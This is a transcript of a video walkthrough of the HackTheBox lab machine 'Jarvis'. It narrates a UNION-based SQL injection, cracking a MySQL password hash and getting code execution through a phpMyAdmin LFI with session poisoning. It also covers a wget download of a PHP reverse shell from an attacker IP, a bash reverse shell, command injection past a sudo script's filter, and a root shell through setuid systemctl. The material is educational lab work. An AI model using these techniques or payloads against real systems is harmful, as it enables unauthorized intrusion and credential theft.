What's going on YouTube? This is Ipsec and we're doing Jarvis from HackTheBox, and I haven't looked at this box since release, so expect the video to be a bit longer than normal. The reason I didn't really want to prepare that much is because I remember this one being a good intro video to SQL injection, so I wanted to show how I tackle the problem, discover it, the problems I run into, and how I tackle those problems. Additionally, there are 3 different ways to get user shell in this box. The first 2 are through PHPMyAdmin. The first one's extracting a password out of the MySQL users table. The second one is using load file and reading PHP config files. And then the third way to get a shell in this box is to abuse the into out file portion of a SQL statement and just drop a file on the box itself. Once you get a shell on the box, there's a few things to do to privest to the Pepper user, and then systemctl is a setuid, I believe, so you can just use that to create a malicious service and execute that to get a root shell. So with all that being said, let's just jump in. As always, we start off with the nmap, so -sc for default scripts, sv enumerate versions, oa put in the nmap directory and call it Jarvis, and then the IP address, which is 10.10.10.143. Can take some time to run, so I've already ran it. Looking at the results, we have just 2 ports open. The first one being SSH on port 22, and its banner tells us it's a Debian box. We also have HTTP on port 80, and its banner also tells us it's Debian and an Apache server. Then you also have the nmap script http-cookie-flags, telling us that when it requested the index page, it returned the PHP session ID cookie, so we know this server most likely runs PHP. Then you got the server header and HTTP title, and the index page is just Stark Hotel. So let's go check out the page. So going over to Firefox and going to 10.10.10.143, we can see the website. It looks like a just hotel booking page. So the first thing we're going to do is send this over to Gobuster while we manually look at it. So we'll do Gobuster dir for directory mode, -u for URL, put in the URL, and -w for word list, user share word list, and then dirbuster directory list to 3 medium.txt. We probably should do, I think, -o for out file. We'll just call this dirbus-root.log. So let that run and start looking at the web page. Going to the very bottom at this contact information, we see a bogus number and a email address. We have supersecurehotel@logger.htb. So we have 2 potential things, logger.htb, which could be a host name, and also supersecurehotel.htb. So what I'm going to do is go into my terminal, edit my host file, and we will clean this up from a previous video and add 10.10.10.143, and this is supersecurehotel.htb, I think. That's it. And then logger.htb. So add those 2 in, and then go to supersecurehotel.htb. We see we are at the same exact page, logger.htb, and again, everything looks to be identical. So that doesn't look like it got us anything. So maybe just keep this in the back of our mind while we keep moving on. Other things, looking at all these links like Facebook, LinkedIn, Twitter to see if there was maybe social media we could scrape to get employees. And looking at the bottom left of the screen, I just see it goes to /pound, which is the anchor tag, which means it goes nowhere. We also have supersecurehotel.htb in this top left. We have a sign-in, and the sign-in, looking at the bottom left of my Firefox window, goes nowhere. Utilities goes nowhere, so a lot of these links aren't really going anywhere. We do have index.php, and then going to these, we have rooms-suites.php and dining-bar.php. One thing I do want to note is when I ran this Gobuster initially, I probably should have done a -x space PHP to specify PHP scripts. If this doesn't find anything, then we'll do that next. So we do have a PHPMyAdmin directory, which is interesting. We'll come back to that. But going over to Rooms, let's see what this is. This looks like a page. Looking at the book now, we do have room.php $COD = 1. And if we go to dining and bar and looking around these all have that anchor tag after it. So clicking these links does nothing. So pretty big indicator that we should do something with the rooms, since this is the link that is taking us somewhere. Clicking book now, we see we're at a page. So what I'm going to do is standard SQL injection, just to add a single quote and then the comment, and then we get the query died because it's not returning anything. We can try a double quote and we get the same exact thing. Normally when things like this happen, I'll send it over to wfuzz and do some light fuzzing. So we can do wfuzz-u and then cod1 fuzz, and then I think -w for word list. Let's do user share sec list fuzzing, and we want, let's see, special-cares.txt. So running this, we'll see what we get. And right off the bat, we can probably hide all 404 errors because that's not interesting to us. So I'll do --HC for hide code. I think that's equals, no, I think it's just a space. Space 404. And now, is it --H capital C? Let's do wfuzz-H. And let's see how to hide. --HC space. I'm running this again. We get a 404 error. So let's go to the page, and it says, hey, we have been bad and banned for 90 seconds. So that sucks. So that's probably why when I did this --HC 404, everything returned as a 404 error. What also is going to stop happening is my Gobuster's not going to work. So I don't know what triggered this. So the next thing we're going to do is probably just do wfuzz first, and if we get banned, we know sending a weird special character bans us. If we don't get banned, then we know probably doing a heavy Gobuster against the site bans us. And while we're banned, we can check if it's the PHP app by just going to PHPMyAdmin. And since we also get the error message here, it means we got banned at Apache. We could try supersecure.htb to see if that has us unbanned. It doesn't. So it looks like we just have to wait that 90 seconds. So I am unbanned now. I can navigate to PHPMyAdmin just fine. And we get username, password. We can try just the default like admin, and we don't get in. Nothing too interesting there, so let's go back and figure out what banned us. The first thing that we want to test is this wfuzz command, since this is what we were doing when we got banned. So running this again, and we're not getting, we just got banned again. So it looks like maybe there's a special character at the end of this that bans us. So that could be interesting. If we go into this special character list, do a less against it, I got through the whole thing. So that's interesting, but while we're banned, we can just take a look at this and see what we can piece together. So the next time we get unbanned, we probably want to run this again and hide everything with 443 words, or maybe 5,916 characters, because I'm kind of curious what these respond. And pound, let's just type these. So type them here, I guess. And pound and nope. Pound isn't really too interesting. We'll get into that in a second. Plus is interesting. Period. And semicolon. I should have just split the pane. That's what I should have done. V weird chars.txt. So in all these, it made the request behave differently. Looking at them, we can probably take off the ampersand and pound sign because these generally mean special things in HTML. I mean, in HTML, and just websites in general, and is like an argument separator. So if we had something after, where is it? The cod is equal to 1, and then you had and, you may be specifying another variable. So that's generally not too interesting. The hashtag, again, that's the anchor. So these things mean something in HTML, and I don't know how wfuzz did the URL encoding on those. So these are the three that are interesting. This period means maybe it's defined as a integer and not a float. Let's just see what happens when we do like 1.0. Semicolon could be the end of a command or a SQL statement, and plus could be like math. The interesting thing here is we have the plus, but not the minus. So looking at what minus does, we see, let's see, where is dash? I can just search dash. Come on. Whoa. I guess dash is not on the special character list because it should be highlighted in yellow. Search again. Yeah, maybe it's not there. Let's just check if we're still banned. I think I killed enough time. I did. So let's send this over to repeater and analyze what's happening. So if we go to room.php, !cod equals 1, this is the page we're at that has the room thing. So turn intercept on, my Foxy proxy set to go to burp suite, refresh the page, press Control R to send it to repeater, Control Shift R, and now we're here. So if we click send, we have 6522 bytes. If we do a plus, let's see what we have, 6522. If we URL encode this plus, we have 6234. So I think wfuzz by default is doing URL encoding. So at least we know that now. And we can encode this, send it forward, and see what the page looks like. We just get nothing per night. So one thing we could do is 1 plus 1. And if this returns a query, then we know math works. Maybe put it in spaces. Spaces and quotes. So that's not working. We can try 2 minus 1. That works. Let's try 3 minus 1. We get something different. So let's take note of this real quick. So at room 1, we're in the super family room. So let's go back here. Room 1, super family. Room 2 is going to be the suite. Suite. And room 3 is going to be a double. Okay. Now let's do -1. And we go to the suite. We do -2. We go to the superior family. So we know we have math in here, and we could also verify by putting like SQL statements, like hex 3 still returns the double room. So at this point, I'm fairly confident we have SQL injection, And I'm also confident the reason why we didn't see it earlier is because the statement doesn't use a single quote or a double quote. So the statement's something like, let's see, select, let's see all the information we get. We got an image, so we can do image URL, rating, room name, cost, description, and you probably got ID, because when we click go to book, it would give us an ID. So that's probably everything we have in the select statement. And then we can do from the table name. So this may be like from all rooms, where COD is equal to 1. So this could be a sample statement. And since they didn't use quotes, when we put a quote and then a comment earlier, or the double quote, we create an uneven number of quotes, which caused the query to fail. If we just do a dash dash space dash, it should work. So there we have it. And with MySQL, we could always just go to like MySQL query structure and see everything we can do. So if we look at this, it's out of this for the first to second here. It's right here. So we did a select from, and we're injecting into this where condition. So we can do everything after this, which includes, where's union? Group by window. Union should be here. We go to union syntax. Don't you hate it when you pick a manual page and it's not what you think it's going to be? Well, union is right after this order, this where condition. There should be a page that has the entire like MySQL structure, but we can do unions. That backfired on me. So we can do union 1, 2, 3, 4, 5, 6. Well, we can do it this way first. 1, error. 2, error. 3, 4, 5. Oh, I think we need union select. You can't just do union. 5, 6. We still get an error. 7. And the query works. So what this does is you have to have the same number of parameters on this right side as you do on the left side of the select statement. So since we have 1, 2, 3, 4, 5, 6, I guess we're missing one thing. So there is an unknown here. So unknown from rooms where cod is equal to this, and then we do union. So we have to have the same number here. So there's 7 things, so that's why we have 7 things in this union. Hopefully that makes sense. And then you can do things if you like put these in quotes. You can overwrite what the select statement pulled and then put information in here. So we do this. If we do union select, is it, I think union all select. Oh. If the query is bad, you have 9999 and return nothing. And then you put that union in. You can see where each parameter is. So the cost is at parameter 3. If we edit 3 to be please subscribe, we can place please subscribe there. We can also run SQL statements. So what I'm going to do is let's just send this into repeater so it's a bit easier to work with. Hopefully it'll be easier to work with. I haven't really prepped to do this video, so if it's a bit bumpy, that's why. Control. Why you're not on URL encoding? Control Shift U. Is that not working anymore? Is that hotkey gone? Right click, convert selection, URL decode. That's what I was hitting. URL decode. See if we do send. But it may be a pain. Let's see. Control U. That's a bit easier to read. I always hate having all the percents. We just have this piece. So we always want to go to price-room. So now if I click send, go here, hit enter. Okay, this will be good. So we can do select one and kind of do a nested query. We have to do select +1 to URL encode that. Click price room. And we don't want this in double quotes. And we see we put 1 here. So if we do like, if we go to like a MySQL cheat sheet, I always love Googling these. So like MySQL cheat sheet, it'll probably come to like Pen Tester Monkey, which is fine. Dev hints, this, we'll go to these two. That's probably not what I want. MySQL cheat sheet, show user, grant all privilege. Let's see. Show tables. I was looking for like show database name. I think we can just do DB name like that. No. Let's see. Let's just Google it. Pen test monkey MySQL cheat sheet. This is the one I normally like. Okay, select add at version. This would be good. Select add at version. Click send. And we can see, if we go to price room, it's MySQL version 10.1.37 MariaDB. So this shows how we can do queries. And there is also the information schema table. And the information schema table contains a bunch of information about everything in MySQL. So if we Google information schema MySQL, go to this table or page, and this is kind of the structure of it. The very first one we kind of want is like the schemata, which is going to tell us all the databases. So we can do schema name, and schema is database and MySQL. So if we do select schema underscore name from information underscore schema dot schemata, and then click send, go to price room, we get nothing. If we do limit 1, we get hotel. So if we do, we can only return 1 line at a time. If we're trying to return multiple lines, we're erroring out. So how we control this is we do like 1, 1. And then we'll get information schema. If we do 1, 2, we move down 1, that's MySQL. And then 3, 1, we get performance schema. And I'm guessing 4 will be the hotel. Let's do 0. Okay, so the first one is hotel. So all this is doing is, this one says return one line. This one is like the head command and showing, hey, grab the very first table, limit it to 1. Second, limit 1, grab the second result, limit 2, grab the third result, and limit it to 1 line. You could also do something a little bit complex with group concat to put all these in 1 line. So if we did select and then the group concat right here. So group underscore concat and then schema name. And we want put them in the separator, which is semicolon from information schema. Let's try this. I think I did group concat correctly. Probably not. I never get this command right the very first time. Oh, I did. So we can see we returned everything on 1 line. If you did this with like BR for line break in HTML, it's probably not going to do what I want it to do. Let's do \r/n for like a return character. And now we got hotel, information schema, MySQL, performance schema. So that's a good way to grab many things. So let's rename this tab to group concat schemata. And we'll create a new pane. And let's go back into this and go into, instead of schemata table, let's jump all the way to the columns table. This is going to give us table schema. This is going to be the table name, or the database name. We want hotel, the table name, and column name is what we want to get out. So we'll do group concat, and then table name. We want a semicolon, column name, underscore name, and comma, from information schema dot columns. And then we want a where table underscore schema is equal to hotel. So if we click send here, do price room, we can get every piece of information out of this. So this database only has 1 table. That table is room, and the parameters are COD, name, price, description, star, image, and mini. So we're missing mini. I don't know what mini is. Maybe mini thumbnail. We could validate that by changing our query. And let's just put this in a separate pane where it may be easier for you to read. Going back to terminal. That's what we did. We can URL encode that. Let's go back to burp. Let's see if that works. Control-Shift-U. Why you... It's so weird. Something hijacked my Control-Shift-U, because whenever I type that, it's going underneath. Is that here? I don't think it's there. Firefox? Not sure what's hijacking it. Let's do convert selection, URL, decode, grab, paste. So that's the query. So the next thing we probably want to do is select group concat. there's really nothing interesting here. There's no usernames or passwords. So the next thing we could probably do is look in other databases. There was hotel. The next one was probably like MySQL. Then you got performance schema, and that's why I put this in a tab. Hotel, MySQL, performance schema, and information schema. This MySQL thing actually contains usernames and passwords. So we can do, where table schema is equal to MySQL. Let's do it this way. And we have to URL encode this. Go here. Control U. Price room. So we can see all the columns in this MySQL thing. Column stat, DB. So DB has user. Is there a password? So host priv. Let's see. Do you have a password field? Let's see. Column priv user. I was pretty sure that this had a password field. I think it's mysql.users. Weird. Let's see. I am doing table name, column name. Let's see. Let's go to a cheat sheet. Select host user password from mysql.user. I don't know why it's not showing us in this command, but let's try this. So this is going to be host. The column name is going to be user. And then we need password. From mysql.user, I think it said. Yep. And then let's go. Send. See, where's the price? So we have localhost, dbadmin, and this password. So let's just put this here. Actually, go there. And I guess we'll crack it. Let's just crack it real quick. I'm going to go over to the Kraken, which is my box I just have for cracking. If we go cd hashcat, v hashes jarvis.mysql, paste this. I'm guessing we don't want that star. /hashcat -- example hashes less MySQL. Let's do grep -i MySQL. So we need -b for before and 1 -a for after 2. So let's see, what type of hash do we have? I'm guessing it's going to be this one, which is mode 300. So we could verify that by just doing echo -n, paste that, wc-c, 40 characters, and then we can do wc-c hashes jarvis.mysql, 41, probably 40 characters in a line break. Did I put one? Yeah, so we can do /hashcat -m 300 hashes jarvis.mysql, and we need a word list, so -w opt word list rock_u, and oh, no -w. just slash. And we can get this cracking. Shouldn't take too long to crack because this is an old hash format and we get it cracked already. And the password is I miss you. So we could have went through all that work, and the alternative is we could have just taken advantage of a different MySQL feature. Instead of doing all this to extract information out of the database, MySQL also has this thing called load file, which is a command. And if we do etc passwd, we can see we can read files. We can also read source code. So if we just do like Room.php and click send, we go to the price. Room.php, maybe we have to do the full path. For www.html, this is the default path for Apache and Debian. Price. I don't get it. We do index.php, what happens? I screwed something up, I think. Let's do etc passwd just to make sure this works. Okay, for some reason it doesn't like loading PHP files. The thing why it may not like it is it may be executing everything between these PHP tags. So we could do MySQL also has 2_base64 and try this. So if we click send, go to price, we get base64 output. That looks good. Ver www.html room.php, click send, go to price, and we get base64. So that's good. Copy this out, go to terminal. We can do v room.php.b64, paste it, base64-d to room.php. Let's just do this in Vim. And we can read files. We do have error reporting 0, this get parameter, include connection.php, room object.php, and right here is where we can see the SQL injection. They just have select stir from room where COD is equal to, and then straight the get parameter. You need to do, I think, parameter. Oh my god, I'm blanking on the name. SQL injection protection. I think parameterized statements. Yeah. This is probably what you want. Parameterized statements to protect against it. Or just use like a framework that will protect you against it by default. But we want to probably get into connection.php because that's how the script is going to connect into MySQL. So we'll do the same exact thing, but do connection.php. We click send, go to price dash, and we get this. Save this. Vim room.php.b64. Nope, this is going to be connection.php. Base64-d connection to connection.php. Read this, and we get the credentials. We got the user, dbadmin, the password, I miss you, and connecting to the database, which is hotel. So we can check out the PHPMyAdmin. So if we go to 10.10.10.143, PHPMyAdmin, we can try these credentials. So username, db, is it lowercase a? Yep. Admin, password, I miss you. And we get logged into PHPAdmin. So the very first thing we want to do is try to figure out what version of PHPMyAdmin this is. So let's see. PHP version's PHP 7, but PHPMyAdmin is 480. So let's just do PHPMyAdmin 480. We'll do changelog. News 480 is released April 7th, 2018. So we can do probably searchploit to see if there's any known exploits. PHPMyAdmin. Holy cow, there's a lot. But we got cross-site request forgery, not too interesting. Authenticated local file inclusion 1. File read. So let's look at this LFI. Searchploit-x for examine. This, let's see. Quest target. So this is showing us how we can do a local file inclusion. So index.php target is equal to db_sql.php. And then this is a double URL encode. %25 is percent. So this is doing %3f. And 3f is, let's see, if we do decoder, %3f, decode as hex, nope, hex, no. What if we get rid of the 3f? 63. I'm not exactly sure what that's doing. %25 is definitely percent, right? $2537. Okay, ASCII hex. There we go. 3f is question mark. So if we go back in here, it's doing a WRL encode to put a second question mark, and then you can give it the ... slashes and include a local file. So let's see. The next thing we have to do is try to find a way to get code execution. And let's maybe just Google it, PHPMyAdmin 480 RCE for remote code execution. Let's see. Vulnspy. So this one is walking through running a script and then getting your session ID and getting the output. So what's happening here is in your PHP cookie, it's placing your session ID. And then when you do a local file inclusion to the session ID, you are able to execute the code. So we'll walk through it twice. The first time we'll do it without a shell in the box. The second time we'll do it with a shell in the box so you can see exactly what happens. So we just have to create a SQL statement first. So we'll do select $PHP, PHP info, exit. So let's go over to Firefox, PHPMyAdmin, do SQL, and we need select PHP, PHP info. Did they actually say exit after that? Okay, yeah, exit. Exit. Like that. And then all they did was run the query. And they did it in single quotes, so we'll do it in single quotes. I don't think that matters. But if we run this query by clicking go, all we see is we printed $PHP. We just printed this. We just did a select on that. So what I'm going to do is go to Tools, Web Developer, Storage, and pull a cookie. Where's storage? There it is. And we want the PHPMyAdmin session cookie. So we'll grab this, copy it, and then the second one was the LFI I can get back to the page. So it's doing on index.php, target is equal to db_sql.php. So, man, I keep thinking I'm in a different tab. So we want index.php, question mark, target is equal to, this probably doesn't matter, but we'll do db_sql.php, db_sql.php, and this is where that double URL encode, so %25, is it 3f? 3f comes in, and then we can do a bunch of slashes, and this is the default directory PHP keeps sessions. So 3f, bunch of slashes, var lib php sessions ses_my key. So I'm just copying this to the clipboard in case something redirects me and I screwed up. But I think I am good. Click go. And we got something weird. Let's see. Browser access. We can try that again. So this is showing me my PHP token. If we do PHP info, I don't see it here. So maybe I was just too slow. So let's try this again. Username, dbadmin. Password is I miss you. Don't save. SQL. Come on. There's no way I crashed it. SQL. Copy this. Click SQL. Let's try this again. Select PHP, PHP info. I'm not going to put the exit. Do that. Click go. Grab this and do this a bit quicker. Don't want to grab the line return. Okay. Qt ends with G. Still looks like my session. There we go. Now we have it running. So we definitely have code execution here. So we could chain this to like download a file or just run a script. We can put any PHP code we want. There is a third way we can get onto this server. So we'll do it that way. I guess actually, let's just finish and get code execution here. So let's v test.php, and let's just Google PHP remote file include. I think I can just do include http 10.10.14.3/t.php. When you're dealing with PHP cookies, you do have a like limited amount of space before it just randomly inserts a bad character sometimes. That's why I'm trying to keep this payload as short as possible. If I run into errors here, I'll probably just do like octal encoding on the IP address. There's different ways you can refer to IP addresses. IP octal convert. If we do this 10.10.14.3, I could also reference the IP by this. So in Linux, if I ping this, it'll ping 10.10.14.3. Same thing with PHP include. So cat test.php, that looks fine. We can make dir dub move test.php into dub, and then we can touch t.php and php -S, and then I think 127.0.0.1:80 will launch a PHP server. This is the same thing as like Python simple HTTP server. So now I can do HTTP 10.10.10 127.0.0.1, and we want to get to test.php, and we didn't error out. So if I go into t.php, I could do PHP echo success. Let's see. Failed to open for inclusion. V test.php. Wonder if I screwed that up, or maybe like remote include is off. The other option is this PHP script is calling the PHP web server, and the PHP web server itself is executing the script, so there's nothing really to give over to the thing. So let's just go ahead and try a PHP shell. So we'll do, so I think cp user share, is it laudanum? It's generally where I go for my PHP web shell. Don't ask what it stands for, I have no idea. This is just a excellent shell. So we do php reverse shell.php. We can delete all this. And the main thing we want is what's just with IP. So we want 10.10.14.3 port. Let's just do 9001 because that's what we like doing. And that's all we need. So let's just move this to, I think, t.php. Yep. So cp php reverse shell to t.php. And we'll host this with Python simple HTTP server. And unlike the PHP one, this won't execute PHP scripts. So if we go back here to test.php, it's just giving us the PHP script. So let's try this now. Go back to this include. And what we want is to run SQL, and we'll do select $PHP, and we want a cat, what's in this, to include this. Okay, we just got to fix these quotes. So let's click go. And then here's the URL we want to hit. Start my server back up. Paste. And something weird happened. Some errors have occurred on this server. And we never hit our box. So we can try this again. Let's just select this. So SQL. Select. Go. Run. And we're still getting error messages. So let's try changing up our approach. So we can do select PHP, $PHP. Should probably make this bigger. System wget 10.10.14.3 / t.php. So now we're just downloading a file at this point. So click go. Go here. We're not getting anything. So what I'm going to do is clear out my PHP session cookie. And we're going to do this again. So let's just grab this, because maybe the cookie is just bad at this point. dbadmin, I miss you. SQL, paste, go, grab this new cookie down here, and we will paste it. Still did not download anything. Select. Wonder what it did not like. We can try SQL. Select PHP exec wget http 10.10.14.3 test.php. Try this way. Click go. Run it. Look here. Still don't have anything. What I'm going to do is change up the way I do quotes. So we'll do single quotes on the inside, double quotes on the out. You'd be surprised about the small changes you make that suddenly just make it work. Also, probably helps if I close it out. Still nothing. I am 10.10.14.3, right? Yep. So let's try this one last time. I'm going to do iptables-l, no iptables on the box, simple HTTP servers running. Let's get a whole new session. So delete this, load the page. Username is going to be db_admin, I miss you, SQL, select PHP exec, and then we want to do wget. We'll do a -O to specify where we want to save the file for www html shell.php, and then we want http 10.10.14.3 / t.php. Okay. So if we click go here, grab this cookie, paste said cookie. That looks better. And we download the file. So maybe I had an error in my PHP or something where it just magically worked. It's funny, whenever you say the very last time, things tend to work. So if we go to 10.10.14.3, what did I call it? Shell.php. So 10.10.43, shell.php. And we just do nc lvnp 9001. We get a shell. So that was the hard way to get a shell in this box. The easy way is going all the way back. So if you remember this union injection, so let's just unyarl encode it, or go to the repeater tab. So we got this union select thing. So let's just go back here and say select 1. So we got this. And let's URL encode this. Go. So we can write anything here. Well, we could also write PHP. We can do PHP info, just like we did before. We just have to URL encode everything. Click go. You can see, where is it? Did not like that. Let's do single quotes. Go. Okay. Maybe it did like it before and I just missed it, but there it is. So we can write that PHP thing here. Well, we also can do, if we go all the way back and read what we can do in SQL. I don't even have it on my thing anymore. So MySQL query structure. Go to the reference manual. You got a into dump file, out file, etc. So if we go all the way back to burp, and we say plus into plus out file plus, and again, those pluses are just spaces. It's just how URLs handle them. For www HTML, please subscribe.php, we can write this file. So going back here, instead of test.php, please subscribe.php. And this needs to be 10.10.14.3. 10.10.10.143. See, we can write that file. You have the 1, 2 ahead, and then 4, 5, 6, 7. But we can execute code that way. So you can drop the same exact thing we did before and drop a file that way. So 2 ways to do this box to get a shell. The second way is obviously much easier. Let's just take the shell we have. Did I exit that? I did. So nc lvnp 9001. Let's get this shell back. Python-c import pty, pty.spawn, bin bash, and then stty or all minus echo. Hit FG, you don't see it typing, hit enter twice, and now you have a proper shell that you have tab autocomplete. So hopefully the video goes smoother here because we're on Linux shell, which I'm much more comfortable with freelancing here. So var lib php sessions, we can see we don't have permission to list the directory. We have to be root to do that. So we'll go into looking at the session cookie once we get root, because we don't have execute permission. We can root. So we're here. We have write and T. I don't know what T means, but we don't have execute permission, which means we can't get into this directory to list it. If we know the file name, we can. So if we did Firefox, go back here. This is going to be cat sess underscore this. That did not go on my clipboard. Cat sess underscore this. There we go. We can see the cookie. So this is just a PHP object, and you can see everything. And right here, we can see what we added to it. So that is exactly how this is working. We're just able to write something to a cookie, and then when we include the cookie, it's executing because it's between these PHP tags. And it's just like local, the standard PHP injection type things, when you like poison a log file and then include the log file with your PHP command. Same thing, just in a cookie. So hopefully that all makes sense. But now let's go look at what we can do on this box. Doing sudo-l, we can see that the pepper www-data can execute this admin utility script as the pepper user. So I'm just going to export term is equal to xterm so I can clear the screen. So the first thing I want to do is look at this. So ls-la, looking at the script, we can execute it. So let's less it, or we can read it. And let's see. Let's just execute it. Sudo-u pepper, if I can type. Sudo-u pep. I did that again. So it wants flags, -s for statistics, -l to list the attacker's IP. So this is how it's detecting our attacks. And -p to enter an IP. So if we do 10.10.14.3, it will ping that IP address. So let's see exactly how that works. I'm just going to cat this. Actually, let's send this script to a box. nc lvnp 90 to script.py. And do we have nc on this box? We do. So let's cat this nc 10.10.14.3 port 90. Okay. Cat script.py. We have it on a box. So now we have a bit better TTY where we can examine this. So the first thing to do is examine this. The path, nothing there. Let's see, most risky. Web logs. Attack level. Dict. Exec ping. So going to the very bottom of the script shows how this switch statement works. So it executes the show header. Then if there's not an argument, it does the help and exits. If sysargv1 is -h, does help exits. Sysargv1, if the argument's -s, it does show statistics, -l, list IP, -p, exec ping. Exec is always interesting, so that's why I'm starting. If we search exec ping, we can see this here. Forbidden, ampersand, semicolon, dash, backtick, double pipe, and pipe. So, never mind. I was thinking maybe this has something to do with the bad characters in wfuzz, but addition did not work. Subtraction did work, so this script was not screwing up things. If any character in this forbidden is in what we enter for an IP, it says got you and then exits. Otherwise, it does ping plus command. So the special characters they're missing here is we can execute commands with the holy crap, there we go. Like this. And who am I will execute the who am I command. Since the $sign in parentheses aren't in the forbidden characters, we should be fine. So if we hit up a few times to do this sudo-u pepper and then execute the script and do pipe who am I, we don't really get anything right now. It's hung. Probably doing a DNS request to try to ping ping pepper because it's trying to ping the IP PEPPER because that's the user we are running it as with sudo. So there we go. Temporary failure in name resolution, and it dies. The very first thing I did with this is probably do the sudo-u thing again and do -1 to see if this would just work. Ver www admin utilities simple.py, and it doesn't work. So the sudo vulnerability isn't working in this case. If you Google sudo vulnerability, it's recent. It's like 3 weeks old. So I was just saying if it could be ran here. If we did sudo-u and then the pepper user ID, which is 1000 for www admin utilities, simple.py-p, we see it works. So yeah, just a different way to specify usernames. If it's out of the bounds of a 32-bit integer, it defaulted to root, and that was the bug. But there has to be one other thing in the sudo config. I think it has to be all but root or something, or any command. There's one small extra thing in this sudo thing that requires for that bug to be present. But I digress. So we have to get a shell in the box. And remember, there's a bunch of bad characters in this, so we can't really just do $this reverse shell, because the reverse shell is probably going to contain some bad characters. So what we're going to do is edit a file in temp. We'll just call this shell.sh, and then do a reverse shell here. So we'll do bash-c, double quote, bash-i, single quote. Wait, what is it? Bash reverse shell pen test monkey. Let's just see what this is. This is what I want. So bash-c, this. Let's put this in single quotes. Actually, we don't need bash-c here, because we can call it bash. That'll be fine. So just need our IP address, which is 10.10.14.3, and we can do 9001. So if we execute this script, bash temp shell.sh, nclvnp 9001, so we're listening, all we do is get a reverse shell. So now we just run this pepper thing again, and we can do bash temp shell.sh, and we're not using any bad characters, so we get a shell as pepper now. We do go into the home directory. There is web, and this is where the logs are stored of bad users. You can see me and see all the queries I've done, which caused me to get banned. So we do sudo-l here, and it's taking a little bit. It looks like it's probably doing a reverse DNS lookup on its host name, which doesn't exist. So take some time. I'm guessing that's what it's doing. This sudo is taking way too long. I think I'm just going to kill it. I'm not sure why it's taking so long. And Control-C killed everything. Oh. That's funny. Hold on. Let's just do this again. Bash temp shell.sh. So I ran this here. I did sudo-l. And look at the top pane. It went over here. So whatever, I'm not directing something correctly. This is probably like standard error. Let's cat etsy shadow. Nope, not standard error because I just see this. One of the outputs is going up here. I don't know what that sudo prompt says, but let's do python-c import pty.spawn bin bash Control-Z st2y raw minus echo, foreground it. If we do sudo-l now, there we go. It stays in this session. So Okay. Wasn't some weird timeout thing. It was just going to a different window that I didn't pay attention to. So now that we're Pepper, we don't know Pepper's password, so we can't just do sudo -l. What we could probably do is we could either run lin enum or just check for setuid binaries. I think this is the command. Is it plus 4,000? There we go, minus 4,000. So we do -ls, we can see permissions. And this is just looking at all the setuid binaries. It's generally the first thing I look at in lin enum. So just run it here. And we can see one thing that is not standard is systemctl. So I know that's not standard just because I've looked at the output of setuid binaries and boxes so much. So the first thing I do is go over to GTFO bins.github.io and look at this, and it says systemctl with setuid function we can do something with. So looking at this, we get instructions on what to do. So here's instructions on if we had sudo. We don't. We have setuid. So this is what we have to do. So tf is equal to make this chmod plus s. I don't know what this first command's doing, but what this is doing is creating a file. So we're doing this echo multiple lines into one file. So let's do this. And this make temp command, all that does, is it mktmp? Is creates a random variable. So that's all that does. So let's do tf is equal to that. And then we will echo this next thing. Multiplied by this. So these are 3 lines. Paste. And this is echoing to that temp directory. So if we go to /temp, oh, it's one of these. The .service. So let's go into .service. And it said exec start, and it wants to execute ID. I don't want to do ID. Let's just execute temp shell.sh. And let's make sure this gets hit with bash. There we go. So lsla bin bash. Yes, that exists. So next thing we have to do is 2 commands. We do link. So systemctl link, fail to link. tf. Weird. Systemctl link. This. No such file or directory. So maybe systemctl has to be in my directory, which systemctl bin. This doesn't make sense. Why aren't you working? Link tf. Let's see. Let's just enable now. Let's move on. See if this works. So go up here, nclvnp 9001. Does not look like it likes that. Temp. Let's move temp. Wait. Cut this. Okay, that does exist. So let's just move this into temp shell.service. And we'll link temp shell.service. I wonder if something's just not correct in my script. vtemp shell.service. bin bash temp shell.sh. That exists. So let's do unit description is equal to shell. And we got service, exec start, install, sure. Link, shell.service. See, exec start. Let's just do temp shell.sh. And we'll do bin bash here, chmod plus x. Let's see. Temp. Let's try enable. Let's just copy this stuff out of temp. And we'll put it into our home directory. Enable home pepper shell.service. That worked. Let's see, did I change anything here? Temp. No, it just did not like it in temp for whatever reason. Okay. Well, now that I did enable, we can just do start unit service mount. Oh, come on. Let's do link enable now. Shell.service. Let's change this to be home pepper. And shell.service will be please work.service. Link to please work.service. chmod plus x shell.sh. And we can do the enable now. And again, I'm just getting enable now from this. And we get a shell. So it just really did not like being in temp. And that may just be because temp is mounted with probably no exec, if I had to guess. Let's see. Mount grep tmp. I don't know. Mount grep no exec. Not actually exactly sure what's going on there, but that is it. So let's just go and look at this PHP thing real quick. So var lib php sessions, do lsla, we can see all of PHP cookies. So going back to PHPMyAdmin, dbadmin, I miss you. dbadmin, I miss you. We can see what a cookie is by going to the storage tab. Where's storage? Storage inspector. There we go. So if we cat this file, cat sess underscore this, cat sess underscore that, we can see our cookie. So this may be easier if, let's see, maybe cat_sess underscore sed s semicolon rn. Is that going to work? There we go. So let's see. Where was I? Here it is. So this is just my PHP cookie, and I was just trying to make it a bit more pretty. Or the output. Pretty, I should say. So if we run a query here, so select, please subscribe, and click go, it's going to put this in that cookie. So we can see right here, SQL query, and we put it in right here. So if we do this, select support on Patreon, and man, that is small. Click go. Cat it again. We no longer have, oh, we do. So it does keep previous queries. I was wrong. So first query, select please subscribe. Second query, select support me on Patreon. So if you screw up doing PHPMyAdmin earlier on, you may have to completely redo your cookie. The other thing to maybe keep in mind is PHPMyAdmin is using double quotes already, so you may want to use single quotes. But yeah, so if one of your things up top had bad PHP, this stuff would not get executed because PHP would be reading this, exit your code that'd be like right here, crash, and not read the rest of the file. So that's probably what was happening to me earlier. I just put in some bad PHP, and that was all she wrote. So with that being said, that is the box. Hope you guys enjoyed it. Take care, and I'll see you all next week.